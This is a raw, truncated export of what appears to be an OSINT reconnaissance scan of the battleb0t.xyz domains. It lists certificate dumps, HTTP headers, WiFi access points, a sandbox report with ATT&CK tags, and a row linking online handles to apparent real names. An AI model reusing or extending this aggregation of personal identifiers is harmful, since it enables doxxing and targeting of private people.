B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Apr 27 08:49:21.510 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:54:5F:22:AA:E5:91:D8:97:BC:1A:12:E0:
0D:19:AD:B4:23:74:C7:19:0B:C4:40:FB:51:89:5B:39:
3E:C4:C1:CC:02:21:00:DD:E6:D8:AC:B4:ED:A2:F3:9F:
C5:81:F6:57:5C:08:09:CE:A0:CE:8E:00:A3:67:0E:10:
B5:84:4C:5D:F0:6B:A3
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : DA:B6:BF:6B:3F:B5:B6:22:9F:9B:C2:BB:5C:6B:E8:70:
91:71:6C:BB:51:84:85:34:BD:A4:3D:30:48:D7:FB:AB
Timestamp : Apr 27 08:49:21.600 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:9D:80:77:45:D7:5E:B4:81:61:12:02:
29:B7:09:6D:AA:A8:EE:C0:C9:01:FE:75:B3:DD:F0:06:
DC:3E:42:DF:D0:02:21:00:F3:29:18:40:3E:1C:7B:74:
47:39:A3:57:7F:3D:0C:BE:90:CC:A8:A1:A7:11:FB:28:
6B:3A:89:A0:1D:92:A4:B6
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : EE:CD:D0:64:D5:DB:1A:CE:C5:5C:B7:9D:B4:CD:13:A2:
32:87:46:7C:BC:EC:DE:C3:51:48:59:46:71:1F:B5:9B
Timestamp : Apr 27 08:49:21.550 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:7C:D6:D7:21:C2:B8:D3:3C:1A:E2:29:5D:
A7:78:9A:B9:61:1E:8F:1D:0D:45:66:77:67:5A:0C:C3:
73:FD:9F:2E:02:20:1B:D9:E7:E8:46:D6:95:23:C8:69:
C9:B7:FD:00:71:38:3D:72:E8:26:CA:93:39:E1:22:47:
44:C3:7B:B6:58:C7
Signature Algorithm: sha256WithRSAEncryption
c2:e5:27:b1:49:8d:0c:b8:23:cc:ad:af:a2:37:17:1f:51:5f:
10:2b:2e:2c:a5:d0:39:c9:d2:53:1f:0e:b5:e4:c2:19:75:77:
48:c8:b8:2e:d8:97:35:66:1c:7f:72:90:0f:1a:b8:3a:65:bd:
9f:90:0c:35:2b:9e:fa:54:ce:78:18:0b:07:4e:0e:d6:da:2d:
b2:8b:53:d5:da:55:08:c8:37:85:a6:8b:12:14:78:6a:d5:51:
7e:f7:58:58:6a:f4:59:0c:a3:31:26:2d:fd:1a:fe:da:d0:05:
5d:26:d1:01:9e:67:1c:9c:4d:2b:07:03:e0:1f:19:40:76:89:
3d:9f:ba:6c:0c:01:c7:12:04:82:d0:3c:b5:b0:6c:8c:48:af:
91:80:42:07:ba:a0:18:f2:c7:57:76:34:05:a4:b2:7b:9f:cd:
f2:57:04:13:8a:15:7b:e3:78:fd:cc:f9:fb:3e:ee:46:57:be:
a8:be:94:c1:0c:96:ec:10:93:e0:36:2d:91:5c:a3:c9:e4:2d:
7c:ba:e9:51:8b:91:a0:77:08:a8:df:48:5b:6f:72:7a:d3:ed:
ad:97:85:76:71:19:18:df:9e:f7:1b:82:3f:24:cc:75:af:96:
74:0e:15:b3:cc:fb:a8:3c:e6:07:2b:89:aa:f9:0a:70:0d:02:
b5:99:9c:87
| kekw.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Shuttle (Net ID: 00:01:36:07:54:71) | 52.3759, 4.8975 |
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:88:a7:3c:db:48:4e:7a:5b:30:55:60:8f:23:20:34:8b:3f
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 19:16:54 2022 GMT
Not After : Mar 13 19:16:53 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:3c:4c:c6:51:31:a3:0e:29:e8:d9:ba:56:72:
ca:d6:92:a9:ca:6b:b2:16:4e:5d:b5:eb:62:3f:02:
41:f1:08:06:a9:cd:7b:f9:04:b2:4c:8e:fb:65:31:
b3:75:c9:6a:7a:3f:e2:3e:46:f0:3e:66:e4:c8:3d:
cb:d8:17:7d:09:c3:b8:4b:0b:d8:99:0b:f7:8b:94:
1b:46:cc:ac:01:f0:8a:0c:c3:ce:98:ae:96:9a:d8:
ee:30:0d:83:be:56:f2:fa:d2:51:6c:e6:b5:3d:4d:
38:62:17:66:35:98:3b:99:b8:ad:43:ad:7a:14:a8:
2a:90:0e:e4:de:5f:31:31:ab:48:0a:dd:2d:64:89:
33:f3:db:a0:b1:f9:a9:c3:da:71:2f:32:05:fa:a1:
40:b4:5f:a2:f6:e5:8b:5d:99:bb:a1:c7:ff:78:70:
fa:fe:96:c0:01:b6:36:4c:98:38:f0:fd:c2:63:a9:
72:11:2f:85:1a:a3:bf:b4:96:2f:f2:45:ce:b3:c4:
6b:ba:0f:b8:a2:6a:78:27:5b:76:b0:c8:42:4e:41:
26:4e:0a:34:15:4a:e9:08:7d:32:c0:a0:48:38:a7:
68:49:b9:00:6e:d4:89:04:f8:ea:e6:dc:02:c0:03:
83:f0:7d:9a:bd:81:f3:1a:7f:93:46:db:06:a1:a5:
91:0f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
11:21:5C:1E:81:22:95:8E:F4:BA:FB:D4:B0:77:CD:45:5F:AE:5E:B1
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 20:16:54.437 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:C8:55:7C:0B:F2:4A:D4:C9:EE:94:0C:
EF:F0:9C:B6:19:B4:91:58:D6:05:71:7A:F5:C2:94:2C:
9E:8C:8E:37:13:02:21:00:C3:46:D2:16:74:93:8F:9F:
59:96:75:0B:A5:1F:5C:5A:BA:2E:0B:68:95:99:31:FD:
8E:F4:F0:AD:8C:28:9C:38
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 20:16:54.945 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:56:36:5F:B8:65:E8:68:80:21:A3:19:B2:
BC:D2:DF:5E:37:2A:78:11:0B:85:DC:F6:3B:9D:68:A0:
01:45:B2:7A:02:21:00:F7:C3:7B:2A:F6:13:73:9F:A7:
7D:92:7F:BE:68:5C:0B:AC:65:3E:D3:C0:77:63:D7:8E:
8C:49:1F:4E:78:C9:F8
Signature Algorithm: sha256WithRSAEncryption
19:28:98:d2:20:85:e1:e5:94:d2:07:4b:30:9a:e6:b6:e4:f1:
ad:75:85:78:99:6b:59:96:02:40:a2:83:06:c7:f8:4b:09:6b:
d8:c6:16:df:8e:4c:8d:6d:4a:1d:5a:f5:c8:a4:e3:2f:c5:9a:
c2:e7:23:9f:4a:37:31:fd:55:44:73:22:2a:44:61:cf:38:41:
c2:bf:84:91:0c:26:d9:7f:95:38:c2:5e:aa:df:96:5c:61:36:
99:62:0f:05:bf:92:14:5f:8a:b8:a2:35:64:d7:1c:77:57:f2:
14:f6:3d:8f:7c:2a:9d:f0:7f:5d:fa:03:91:91:47:ff:d2:1a:
85:ec:d6:48:54:87:06:a2:cf:92:72:de:97:97:3d:dc:bf:11:
68:d0:47:02:79:9f:6f:0e:40:4b:ee:a8:97:3a:1f:7e:86:fc:
be:c0:35:24:74:e2:90:dc:a8:be:80:41:5d:16:68:1a:e2:f2:
91:2d:ad:23:3a:69:76:43:d0:49:f2:a4:be:8e:a3:7f:0d:0c:
dc:d6:f8:b0:66:4e:c9:15:34:47:d2:92:fb:73:d0:4a:4c:2e:
53:df:fc:69:43:c4:55:ae:6f:33:b7:7f:e1:98:80:11:3e:a5:
b5:ef:1b:cd:21:0c:3d:64:7d:11:08:c6:8c:70:59:7e:61:c0:
ea:e4:74:3d
|
| 2023-05-12 02:44:27 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:8d:d7:e0:05:18:38:a5:db:8a:48:64:f2:68:9a:98:22:c8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 26 02:43:31 2023 GMT
Not After : Jul 25 02:43:30 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Apr 26 03:43:31.388 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:43:38:D1:BA:46:EB:FB:AE:E5:0E:F5:96:
0C:2E:94:E5:49:45:23:64:6A:0D:BD:FC:87:A8:B8:00:
87:FD:24:62:02:20:75:87:54:4A:DF:64:4F:88:2E:B1:
25:57:3C:E7:3A:E0:19:3B:72:E0:C9:1A:87:B9:BB:3F:
35:51:E8:55:8F:82
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 26 03:43:31.409 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:5D:9E:62:37:CB:DB:77:1F:86:0C:C3:56:
8B:76:28:CE:A6:09:34:6A:3E:14:48:88:F6:21:96:4B:
D9:19:A8:EE:02:21:00:BC:CD:90:3B:08:38:44:A5:BB:
D6:38:35:73:D2:AD:F4:37:33:C9:DB:0D:66:F0:E9:9B:
ED:6A:44:1F:1B:F5:8E
Signature Algorithm: sha256WithRSAEncryption
7c:fa:bc:17:47:a7:e5:00:0d:95:46:f6:aa:b8:5c:00:e2:ec:
d7:d1:7a:8b:68:b6:74:b4:92:6d:3d:5e:34:79:68:36:4b:b1:
22:bc:39:10:53:ed:b5:6d:cb:32:be:a6:64:84:36:56:88:b4:
46:53:a9:13:77:42:0f:15:bd:f9:cb:e5:28:5d:fb:7e:a2:45:
2c:88:d0:5e:f0:2b:7e:c6:76:b9:0b:22:71:21:a1:7c:97:5c:
3a:e6:c7:51:0e:74:ba:87:b5:20:a9:b3:67:69:9c:c8:fc:3e:
a3:b5:ad:ee:73:7a:3e:e4:18:0a:93:40:47:fa:a9:04:04:e1:
f7:88:c4:73:97:3f:0c:9b:41:a3:36:f3:ec:33:03:ab:0c:30:
00:c0:20:bd:7a:4b:9a:0b:2b:5b:6d:f2:ba:7f:cc:e9:7b:ea:
fb:92:46:62:0b:ad:ee:b0:ba:89:ac:82:3a:17:07:50:53:81:
b3:41:01:ce:5c:08:dd:10:1b:6c:39:d6:14:34:c6:10:a8:c1:
d6:c2:f7:02:f7:45:91:38:08:18:a2:cd:a4:11:ec:4f:45:cb:
9e:27:ab:1e:0d:3e:e8:66:62:38:57:e6:40:15:8a:71:ee:e2:
dc:77:56:dc:8b:57:bb:4b:a9:03:f5:23:c6:cf:0a:e7:07:60:
58:ae:4b:bd
|
| 2023-05-12 02:44:03 | Username | No | SpiderFoot UI | 7 | 0 | 0 | 0 | None | _BattleB0t_ | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:53:45 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache_Hits": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["C1F8:9B05:D303FE:F3CF12:645CF509"], "Age": ["0"], "X_Cache_Hits": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-gig2250041-GIG"], "X_Cache": ["MISS"], "X_Timer": ["S1683813642.858818,VS0,VE273"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["df03515606cb10d86a4e0fd793a1bc65b6eaa2df"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8002::153 |
| 2023-05-12 02:54:00 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 104.21.6.166 |
| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | jloup@gzip.org | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://cndglobelogistics.com/index.php/about', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f2c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f2c_IESQMMUTEX_0_331"\n "IsoScope_f2c_IESQMMUTEX_0_519"\n "IsoScope_f2c_IE_EarlyTabStart_0x948_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f2c_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"\n "IsoScope_f2c_ConnHashTable<3884>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"31.220.3.218:443"\n "104.21.89.62:443"\n "172.64.133.15:443"\n "142.250.189.170:443"\n "104.17.24.14:443"\n "151.101.1.229:443"\n "142.250.191.46:443"\n "69.16.175.10:443"\n "185.199.109.153:443"\n "142.250.188.3:443"\n "142.250.191.67:443"\n "142.251.46.170:443"\n "104.22.24.131:443"\n "52.155.62.95:443"\n "172.67.38.66:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "cdn.lineicons.com"\n "cdnjs.cloudflare.com"\n "cndglobelogistics.com"\n "code.jquery.com"\n "embed.tawk.to"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "parsleyjs.org"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "translate.google.com"\n "translate.googleapis.com"\n "use.fontawesome.com"\n "va.tawk.to"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="col-lg-auto col-4 my-3"><img src="/images/clients/youtube.png" alt="YouTube Thumb" /></div>" (Indicator: "dir "; File: "about_2_.htm")\n Found string "* Copyright 2011-2019 Twitter, Inc." (Indicator: "dir "; File: "style-a984db922da29019ca5adc1e5082e607_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar642D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-373', u'name': u'Contains ability to send data (Powershell command string)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "Out-Default"; File: "about_2_.htm")\n Found string "<body class="site astroid-framework com-jdbuilder view-page layout-default itemid-105 article-padding-none about tp-style-12 ltr en-GB">" (Indicator: "Out-Default"; File: "about_2_.htm")\n file/memory contains long string with (Indicator: "Out-Default"; File: "urlref_httpscndglobelogistics.comindex.phpabout")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3" and extension "jpg"\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4" and extension "jpg"\n "business-man_1_.png" has type "PNG image data 475 x 665 8-bit/color RGBA non-interlaced" and extension "png"\n "NickCusworth_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 Exif Standard: [TIFF image data big-endian direntries=21 manufacturer=Canon model=Canon EOS 5D Mark III orientation=upper-left software=Microsoft Windows Photo Viewer 6.1.7600.16385 datetime=2013:11:04 12:20:51] baseline precision 8 148x197 components 3" and extension "jpg"\n "16_1_.png" has type "PNG image data 716 x 1016 8-bit/color RGBA non-interlaced" and extension "png"\n "joomla_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "evernote_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "adobe_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "youtube_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "googledrive_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "cisco_1_.png" has type "PNG image data 160 x 45 8-bit colormap non-interlaced" and extension "png"\n "arrow_down_1_.png" has type "PNG image data 5 x 3 8-bit/color RGBA non-interlaced" and extension "png"\n "switcher_1_.png" has type "PNG image data 10 x 19 8-bit/color RGBA non-interlaced" and extension "png"\n "blank_1_.png" has type "PNG image data 1 x 1 1-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab641D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab641D.tmp]- [targetUID: 00000000-00001016]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df5204982cf225e3cc.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{1e3592f5-ee3f-11ed-905e-080027ef242f}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1e3592f3-ee3f-11ed-905e-080027ef242f}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2c8ce3db8adea7b0.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "style-a984db922da29019ca5adc1e5082e607_1_.css" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "iStock_000039291924_Medium_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 progressive precision 8 1934x993 components 3"- [targetUID: N/A]\n "cnclogistics-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 300x300 segment length 16 Exif Standard: [TIFF image data big-endian direntries=4] baseline precision 8 693x555 components 4"- [targetUID: N/A]\n "business-man_1_.png" has type "PNG image data 475 x 66 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | wattpad (Category: social)
https://www.wattpad.com/user/Altpapier | Altpapier |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-access-domain: panel.battleb0t.xyz | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.220): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Brandon (Net ID: C4:49:BB:70:F9:3A) | 37.751, -97.822 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": 